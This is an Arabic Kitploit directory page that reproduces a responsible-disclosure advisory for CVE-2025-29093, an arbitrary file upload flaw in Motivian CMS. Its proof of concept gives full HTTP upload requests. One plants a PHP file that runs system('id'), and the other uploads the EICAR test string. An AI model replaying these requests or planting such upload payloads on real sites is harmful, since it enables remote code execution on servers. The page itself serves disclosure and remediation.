Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29093-Arbitrary-File-Upload — يكشف هذا المستودع عن ثغرة أمنية اكتُشفت في نظام إدارة المحتوى Motivian الإصدار v.41.0.0. | Kitploit
أدوات/GitHubGitHub/framarcuccio/cve-2025-29093-arbitrary-file-upload
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubframarcuccio/cve-2025-29093-arbitrary-file-upload

CVE-2025-29093-Arbitrary-File-Upload

يكشف هذا المستودع عن ثغرة أمنية اكتُشفت في نظام إدارة المحتوى Motivian الإصدار v.41.0.0.

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29093-رفع-ملف-تعسفي

يكشف هذا المستودع عن ثغرة أمنية اكتُشفت في Motivian Content Management System v.41.0.0.

  • CVE-2025-29093: رفع ملف تعسفي

تم الإبلاغ عن هذه الثغرة إلى البائع وفقًا لممارسات الإفصاح المسؤول، وإلى MITRE، التي خصصت معرّف CVE مؤقتًا. ويتم نشر التفاصيل بعد انتهاء فترة الإفصاح البالغة 45 يومًا.

معلومات عامة

  • العنوان: Motivian رفع ملف تعسفي
  • نوع الثغرة: رفع ملف تعسفي
  • بائع المنتج: Motivian
  • المنتج: Motivian Content Management System
  • الإصدار المتأثر: Motivian CMS v.41.0.0
  • المكوّن المتأثر: Content/Gallery/Images
  • ناقل الهجوم: عن بُعد
  • التأثير: رفع ملف تعسفي خبيث
  • الخطورة: متوسطة
  • درجة CVSSv3: 6.5
  • متجه CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
  • الخطورة حسب CISA-ADP: عالية
  • درجة CVSSv3 حسب CISA-ADP: 8.2
  • متجه CVSSv3 حسب CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
  • تاريخ الاكتشاف: 2025-02-03
  • المكتشف: Francesco Marcuccio
  • الحالة: تم الإبلاغ إلى البائع في 7 أبريل 2025 - لم يتم تلقي أي استجابة/إصلاح حتى 22 مايو 2025

الوصف

تسمح ثغرة رفع الملفات في Motivian Content Managment System v.41.0.0 لمهاجم عن بُعد برفع ملفات تعسفية ذات امتدادات مصممة (مثل .php و.png و.txt) تحتوي على تعليمات برمجية خبيثة، عبر مكوّن Content/Gallery/Images.

إثبات المفهوم

يمكن استغلال الثغرة عن طريق رفع ملفات بامتدادات مختلفة. ولأغراض التوضيح، تم استخدام حالتين لإثبات المفهوم: الأولى تتضمن ملف .php يحتوي على تعليمات برمجية خبيثة، والثانية تستخدم ملف .txt يحتوي على سلسلة اختبار EICAR. تم رفع كلا الملفين عبر مكوّن Content/Gallery/Images.

فيما يلي النص الكامل لطلبات واستجابات HTTP المستخدمة لتوضيح المشكلة:

طلب Burp EICAR

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"

-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"

M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--

طلب Burp PHP

root@kitploit:~
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"

304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"


------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"

false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"

token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"

77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream

<?php 
echo system('id'); 
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--

استجابة Burp

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729

المعالجة

لا تسمح للمستخدمين برفع ملفات تعسفية. نفّذ تحققًا صارمًا من الملفات (فحص نوع MIME والمحتوى)، وعشوائية في أسماء الملفات، وقيّد أدلة الرفع.

الجدول الزمني للإفصاح

التاريخالإجراء
2025-02-06طلب معرّف CVE (CNA: MITRE)
2025-04-02تعيين معرّف CVE
2025-04-07تم الإبلاغ عن الثغرات إلى البائع
2025-05-31إفصاح عام بعد انتهاء فترة الإفصاح البالغة 45 يومًا (54 يومًا إجمالًا)
2025-06-04التسجيل الرسمي والإدراج في قاعدة بيانات MITRE وبوابة NIST/NVD

التقدير

  • تم الاكتشاف والإفصاح المسؤول بواسطة:
    Francesco Marcuccio
    مستشار أمن سيبراني، مختبِر اختراق

  • يُدرج إسناد الاكتشاف في MITRE على النحو التالي:
    Francesco Marcuccio
    مستشار أمن سيبراني، مختبِر اختراق

الروابط

روابط مرجعية: MITRE NIST

الحالة

معرّف CVE هذا في حالة PUBLISHED رسميًا. سيتم تحديثه بدرجة CVSS من قبل NIST بعد التحليل.

تنزيل الأداة